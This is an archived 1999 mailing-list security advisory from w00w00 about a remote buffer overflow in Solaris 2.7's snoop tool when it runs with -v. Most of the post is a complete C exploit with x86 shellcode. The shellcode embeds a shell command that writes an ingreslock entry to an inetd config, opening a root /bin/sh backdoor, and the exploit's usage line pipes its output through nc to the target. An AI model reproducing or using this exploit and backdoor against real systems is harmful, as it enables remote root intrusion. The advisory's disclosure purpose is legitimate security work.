|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
w00giving #8] Solaris 2.7's snoop
Subject: w00giving #8] Solaris 2.7's snoop
From: Aleph One (aleph1
UNDERGROUND.ORG)
Date: Tue Dec 07 1999 - 00:46:12 CST
- Next message: Randal L. Schwartz: "Re: HP Secure Web Console"
- Previous message: Dustin Miller: "Re: new IE5 remote exploit"
- Next in thread: Shane A. Macaulay: "Re: w00giving #8] Solaris 2.7's snoop"
- Reply: Shane A. Macaulay: "Re: w00giving #8] Solaris 2.7's snoop"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK)
From: Matt Conover <shokcannabis.dataforce.net>
To: newstechnotronic.com
cc: w00w00blackops.org
Subject: [w00giving #8] Solaris 2.7's snoop
Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000cannabis.dataforce.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-newstechnotronic.com
Precedence: bulk
[Note: as we promised, our website and technotronic will get this advisory
before anything else does. Thanks for participating in technotronic.]
w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html
Discovered by: K2 (ktwoktwo.ca)
Snoop is a program similar to tcpdump that allows one to watch
network traffic. There is a buffer overflow in the snoop program when run
in verbose (-v) mode that occurs when a domain name greater than 1024
bytes is logged, because it will overwrite a buffer in print_domain_name.
This vulnerability allows remote access to the system with the privileges
of the user who ran snoop (usually root, because it requires read
privileges on special devices).
---------------------------------------------------------------------------
Exploit (by cheez):
/*
Remote Solaris 2.7 x86 snoop exploit
Run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop -v"
Thanks str/horizon for shellcodes (hi plaguez)
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";
#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0
char buffer[SIZE];
const char x86_nop=0x90;
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;
int main (int argc, char *argv[])
{
int i;
if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtoul(argv[2], NULL, 0);
memset(buffer, x86_nop, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < SIZE-4; i += 4)
*((int *) &buffer[i]) = esp+offset;
fprintf(stderr,"0x%x\n", esp+offset);
printf("%s", buffer);
return 0;
}
---------------------------------------------------------------------------
Patch:
Because Sun Microsystems doesn't include source, we must wait for them to
release a patch.
---------------------------------------------------------------------------
http://www.roses-labs.com, http://www.napster.com,
http://www.technotronic.com, http://www.w00w00.org
- Next message: Randal L. Schwartz: "Re: HP Secure Web Console"
- Previous message: Dustin Miller: "Re: new IE5 remote exploit"
- Next in thread: Shane A. Macaulay: "Re: w00giving #8] Solaris 2.7's snoop"
- Reply: Shane A. Macaulay: "Re: w00giving #8] Solaris 2.7's snoop"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b27 : Mon Dec 06 1999 - 23:52:51 CST